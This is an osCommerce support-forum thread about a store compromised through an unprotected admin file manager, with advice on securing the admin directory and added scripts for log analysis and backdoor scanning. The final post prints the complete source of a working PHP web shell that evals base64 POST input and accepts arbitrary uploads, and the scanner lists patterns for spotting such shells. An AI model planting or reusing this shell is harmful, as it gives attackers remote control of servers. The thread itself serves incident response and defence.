
Site Hacked due to osCommerce


17 replies to this topic

#1 TBK3

  • Community Member
  • 86 posts
  • Real Name:Tom
  • Location:Sonoma, California

Posted 30 August 2004, 18:58

I started receiving e-mails from customers last night. At first it appeared to be a non-issue; this morning I received the following from my host:

I'm still investigating the matter, however I can say that your site was indeed compromised via osCommerce on 8/5/2004... Even though you are running the osCommerce 2.2 version (latest available for download), it would seem that this cracking crew is using a fairly recent exploit... You can view the vulnerability list for this script here: http://www.osvdb.org/searchdb.php?vuln_tit...d&search=search

The crackers appear to hang out in an IRC channel named #hack.ru, and this coincides with some of the (cracker tools) configuration files being in russian...

They had full access to your site, and at this point none of your content can be trusted...

What I will do is tarball your entire site so that you can download it... Since they had full access, you will need to completely audit each and every file to ensure there were no further defacement and/or backdoors/trojans installed into your account...

IS THERE A SECURITY PATCH FOR THIS????

#2 drakonan

  • Community Member
  • 335 posts
  • Real Name:drakonan
  • Gender:Male

Posted 30 August 2004, 19:04

Which of the vulnerabilities that your link provides was used and what evidence do you have of this?
- - - -
Sometimes, ignorance is bliss.

#3 Mibble

  • Community Member
  • 13,404 posts
  • Real Name:JAO
  • Location:MA (US): 42n22, 71w04, Massachusetts

Posted 30 August 2004, 19:04

If you read what it states, in order for anyone to access that alleged security breach, they would need (if your site is password protected in the admin) to know a username and password to get into the admin area to execute the problem.
One thing I know: most people use very simple passwords and names for their admin or do not even have themselves protected.
Was your site protected in the admin area?

#4 drakonan

  • Community Member
  • 335 posts
  • Real Name:drakonan
  • Gender:Male

Posted 30 August 2004, 19:10

You simply needed to have the newest release of osCommerce and a password protected admin to be protected from all these problems.
- - - -
Sometimes, ignorance is bliss.

#5 TBK3

  • Community Member
  • 86 posts
  • Real Name:Tom
  • Location:Sonoma, California

Posted 30 August 2004, 19:47

Thanks for the feedback.

The secure admin contributions that I have tried to apply do not seem to work with my configuration; the secured area operates on an entirely different server.

I had written the host to secure the admin directory and that was supposed to have happened ....

The good news is that I may have a copy from before the breach (8/5/2004).

As to evidence, I am simply relying on the tracking through the internal logs by my host.

I am running the most current version of osCommerce.

#6 drakonan

  • Community Member
  • 335 posts
  • Real Name:drakonan
  • Gender:Male

Posted 30 August 2004, 20:29

Before you went live you should have had that protected. In my opinion, you weren't hacked if they simply were able to go to your admin folder.

I didn't install any kind of contrib for that, folder password protecting can be done through most cpanels, and if not there, manually with a .htaccess file.

It's pretty much a given that an osc install will have a /admin folder either under the /catalog dir or "beside" it.
- - - -
Sometimes, ignorance is bliss.

#7 TBK3

  • Community Member
  • 86 posts
  • Real Name:Tom
  • Location:Sonoma, California

Posted 30 August 2004, 21:14

I guess hacked is in the rear of the receiver. The code on my website has been described as "riddled."

If someone would describe your security suggestions a bit simpler, I would appreciate it. I had already requested that the htaccess be set for my admin directory.

I have repeatedly tried to get advice on admin security, but the general attitude has been, "that's already been answered," but the answers make little sense.

While I may not be as gifted as some, neither am I a complete idiot. A solid, basic explanation in English is what's needed, please.

Additionally, from my reading from the weblink in my initial posting, there is a file management program based on osCommerce which appears to circumvent security.

#8 AlanR

  • Community Member
  • 3,711 posts
  • Real Name:Alan Rogers

Posted 30 August 2004, 21:31

I think one reason people hesitate to give specific instructions regarding .htaccess is that some newbies have gotten completely tangled up with it. It then spawns a whole series of problems. The best thing is to use the facilities provided by your host and if your host does not offer tools for protecting folders then switch hosts, it's basic functionality that any good host should offer.

There's also some basic security that is wise in addition to .htaccess.

Rename the admin folder and put it outside of catalog. It can be anywhere, any layer deep. Most people seeking to exploit osC will look for an admin folder and most will find it because hardly anyone moves or renames it.

I think file_manager.php can be removed with hardly any loss since its editing features cause so many problems anyway.

There are some other security tricks but I'm not going to post them in public.
Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux
Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

#9 TBK3

  • Community Member
  • 86 posts
  • Real Name:Tom
  • Location:Sonoma, California

Posted 30 August 2004, 22:03

I thought I would share with you how I lost my site. This is correspondence with my site hosts:

####
How can you tell that 8/5 was the date of the hack?
####

Because that is when there is a concentrated effort to crack: /catalog/admin/file_manager.php

from the IP: 57.72.131.73

They used the exploit to upload some 'cracker helper' scripts, one of them being: /catalog/nfm.php (their file manager)

The first access to this was: 8/5/2004 10:52:39

The way the exploitation efforts transpired, it follows a logical progression from cracking your script to uploading then using cracker friendly utilities (such as nfm.php)...

I have found the following classes of cracker utils:
1) nfm.php == remote file manager
2) rvtr.php == remote file viewer
3) bindit == remote command line shell binder
4) overkill == program to try and gain root privileges from the 'overkill' binary (we are unaffected by this)
5) psybnc == anonymous IRC proxy daemon
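The host's account above reconstructs the break-in from the web server's access log. As an added example (not from the thread or from osCommerce), this Python script does the same over constructed Apache combined-log lines: it counts hits on file_manager.php per client address and records the first request for any .php path outside the known osCommerce tree, which is how a dropped script like nfm.php shows up. The IP addresses, timestamps and the KNOWN set are constructed.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed Apache combined-log lines mirroring the host's account (a burst
# against file_manager.php, then the first hit on nfm.php); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Aug/2004:10:40:02 -0700] "GET /catalog/index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.9 - - [05/Aug/2004:10:41:10 -0700] "GET /catalog/admin/file_manager.php HTTP/1.1" 401 512 "-" "Mozilla/4.0"
198.51.100.9 - - [05/Aug/2004:10:41:11 -0700] "GET /catalog/admin/file_manager.php HTTP/1.1" 401 512 "-" "Mozilla/4.0"
198.51.100.9 - - [05/Aug/2004:10:41:13 -0700] "POST /catalog/admin/file_manager.php?action=save HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
198.51.100.9 - - [05/Aug/2004:10:52:39 -0700] "GET /catalog/nfm.php HTTP/1.1" 200 8192 "-" "Mozilla/4.0"
203.0.113.7 - - [05/Aug/2004:10:55:00 -0700] "GET /catalog/product_info.php?products_id=3 HTTP/1.1" 200 7000 "-" "Mozilla/4.0"
198.51.100.9 - - [05/Aug/2004:11:02:01 -0700] "GET /catalog/nfm.php HTTP/1.1" 200 4096 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse(lines):
    """Yield (ip, timestamp, method, path, status) for each parsable line."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]          # drop the query string
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        yield ip, when, method, path, int(status)

def admin_hits_by_ip(lines, target="/catalog/admin/file_manager.php"):
    """Requests to the admin file manager per client IP, most active first."""
    c = Counter(ip for ip, _, _, path, _ in parse(lines) if path == target)
    return c.most_common()

def first_access(lines, known_paths):
    """First time each .php path outside the known osCommerce tree was requested.
    Returns {path: (ISO timestamp, ip)}; a dropped script appears here."""
    seen = {}
    for ip, when, _, path, _ in parse(lines):
        if path.endswith(".php") and path not in known_paths and path not in seen:
            seen[path] = (when.isoformat(), ip)
    return seen

KNOWN = {"/catalog/index.php", "/catalog/product_info.php",
         "/catalog/admin/file_manager.php"}

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print(admin_hits_by_ip(lines), first_access(lines, KNOWN))
```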

#10 jenming

  • Community Member
  • 4 posts
  • Real Name:J Hou

Posted 31 August 2004, 06:17

For a decent description on how to use an .htaccess file to secure a directory, check out:

http://httpd.apache.org/docs/howto/auth.html

#11 Mark Evans

  • Team Member
  • 2,428 posts
  • Real Name:Mark
  • Gender:Male
  • Location:Behind you :-P

Posted 31 August 2004, 07:29

If you don't protect your admin there isn't much we can do.

The filemanager in CVS has been updated to prevent this from being possible in newer versions of osCommerce.
Mark Evans
osCommerce Monkey & Lead Guitarist for "Sparky + the Monkeys" (Album on sale in all good record shops)

---------------------------------------
Software is like sex: It's better when it's free. (Linus Torvalds)

#12 april_floyd

  • Community Member
  • 59 posts
  • Real Name:Tom Watson

Posted 31 August 2004, 09:39

I have been reading this topic to ascertain the best method to secure my site (not yet open to public). If I rename the Admin Directory will that stop anything working? Is it simply a matter of changing the name or is there something else to do?

#13 ozcsys

  • Community Member
  • 5,002 posts
  • Real Name:Richard
  • Location:NW Arkansas USA

Posted 31 August 2004, 11:34

april_floyd, on Aug 31 2004, 03:39 AM, said:

I have been reading this topic to ascertain the best method to secure my site (not yet open to public). If I rename the Admin Directory will that stop anything working? Is it simply a matter of changing the name or is there something else to do?
You can rename it and move it but you will need to make sure that you change the path info in your admin/includes/configure.php file to match its new name and location.
The Knowledge Base is a wonderful thing.
Do you have a problem? Have you checked out Common Problems?
There are many very useful osC Contributions
Are you having trouble with a installed contribution? Have you checked out the support thread found Here
BACKUP BACKUP BACKUP!!! You did backup, right??

#14 TBK3

  • Community Member
  • 86 posts
  • Real Name:Tom
  • Location:Sonoma, California

Posted 01 September 2004, 18:49

To avoid a further break-in do I only need to protect the Admin directory, or where does the moat need to be dug to protect the gate?

#15 Mibble

  • Community Member
  • 13,404 posts
  • Real Name:JAO
  • Location:MA (US): 42n22, 71w04, Massachusetts

Posted 01 September 2004, 18:50

Only the admin; if you protect the others then the customer cannot purchase...

#16 TBK3

  • Community Member
  • 86 posts
  • Real Name:Tom
  • Location:Sonoma, California

Posted 03 September 2004, 04:36

Interesting, whenever I tried one of the protection contributions they DID prevent anyone from ordering anything.

As soon as I can get my courage up, I'll give it a try.

#17 Johnson

  • Banned
  • 5,205 posts
  • Real Name:Matti Ressler
  • Location:Sydney, Australia

Posted 04 September 2004, 13:12

TBK3, on Sep 3 2004, 12:36 AM, said:

Interesting, whenever I tried one of the protection contributions they DID prevent anyone from ordering anything.

As soon as I can get my courage up, I'll give it a try.
I do not believe that there are any contributions that will secure your site - you must implement directory permissions throughout your whole site - the admin must be password protected server side - password scripts are easily bypassed.

Matti
Matti Ressler

We were all once expert at...... nothing
_____

#18 Googlugly

  • Community Member
  • 1 posts
  • Real Name:JY

Posted 27 June 2010, 18:50

TBK3, on 30 August 2004, 18:58, said:

I started receiving e-mails from customers last night. At first it appeared to be a non-issue; this morning I received the following from my host:

I'm still investigating the matter, however I can say that your site was indeed compromised via osCommerce on 8/5/2004... Even though you are running the osCommerce 2.2 version (latest available for download), it would seem that this cracking crew is using a fairly recent exploit... You can view the vulnerability list for this script here: http://www.osvdb.org/searchdb.php?vuln_tit...d&search=search

The crackers appear to hang out in an IRC channel named #hack.ru, and this coincides with some of the (cracker tools) configuration files being in russian...

They had full access to your site, and at this point none of your content can be trusted...

What I will do is tarball your entire site so that you can download it... Since they had full access, you will need to completely audit each and every file to ensure there were no further defacement and/or backdoors/trojans installed into your account...

IS THERE A SECURITY PATCH FOR THIS????
Same stuff happened to me on 3 of my osCommerce websites.

One of the files used by the hackers is "sys.php" and the content is as follows:

<?php
// Backdoor as posted: a triple-hashed "key" from the POST body gates the two actions below.
if (sha1(md5(sha1($_POST['key']))) == "697e86fd67cd215cfa03b98a5c3a1d7b34a79534")
    if (isset($_POST['eval']))
        // Runs arbitrary attacker-supplied PHP decoded from the POST body.
        eval(base64_decode($_POST['eval']));
    else
        // Drops an uploaded file beside the script, keeping the client-chosen file name.
        move_uploaded_file($_FILES['uploaded']['tmp_name'], basename($_FILES['uploaded']['name']));
else
    // Requests without the key are silently redirected to the site root.
    header("Location: /");
?>
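A site restored from the host's tarball has to be audited file by file, and the sys.php above is the kind of thing that audit is looking for. As an added example, not code from the thread or from osCommerce, this Python scanner flags PHP files that carry the same constructs (eval of base64-decoded request input, move_uploaded_file with a client-chosen name, a hashed key compared against a constant hash, and the redirect-on-failure). The two PHP samples and the scratch-directory file names are constructed.

```python
import os
import re
import tempfile

# (name, regex) indicators for the backdoor constructs quoted above.
INDICATORS = [
    ("eval_of_decoded_input", re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("unrestricted_upload", re.compile(r"move_uploaded_file\s*\([^;]*\$_FILES\[[^;]*\]\s*\[\s*['\"]name['\"]\s*\]", re.S)),
    ("hashed_key_gate", re.compile(r"(sha1|md5)\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)\b[^;]*==\s*['\"][0-9a-f]{32,40}['\"]", re.S)),
    ("redirect_on_failure", re.compile(r"header\s*\(\s*['\"]Location:\s*/['\"]\s*\)")),
]

def scan_source(src):
    """Return the names of the indicators present in one PHP source text."""
    return [name for name, rx in INDICATORS if rx.search(src)]

def scan_tree(root):
    """Walk a restored site copy; map each .php path with at least one hit to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith(".php"):
                p = os.path.join(dirpath, f)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
                if found:
                    hits[p] = found
    return hits

# Constructed samples: a minimal shell with the same constructs as the posted
# sys.php (the hash is md5 of the empty string), and a harmless osCommerce-style page.
SHELL_SAMPLE = """<?php
if (md5($_POST['k']) == "d41d8cd98f00b204e9800998ecf8427e") {
    if (isset($_POST['c'])) eval(base64_decode($_POST['c']));
    else move_uploaded_file($_FILES['u']['tmp_name'], basename($_FILES['u']['name']));
} else header("Location: /");
?>"""
BENIGN_SAMPLE = """<?php
require('includes/application_top.php');
$products_id = (int)$_GET['products_id'];
?>"""

def demo():
    """Write both samples into a scratch directory, scan it, and return hits by file name."""
    d = tempfile.mkdtemp()
    for name, src in (("sys.php", SHELL_SAMPLE), ("product_info.php", BENIGN_SAMPLE)):
        with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
            fh.write(src)
    return {os.path.basename(p): v for p, v in scan_tree(d).items()}
```

Only sys.php is reported; the benign page uses request input too, but none of the shell constructs.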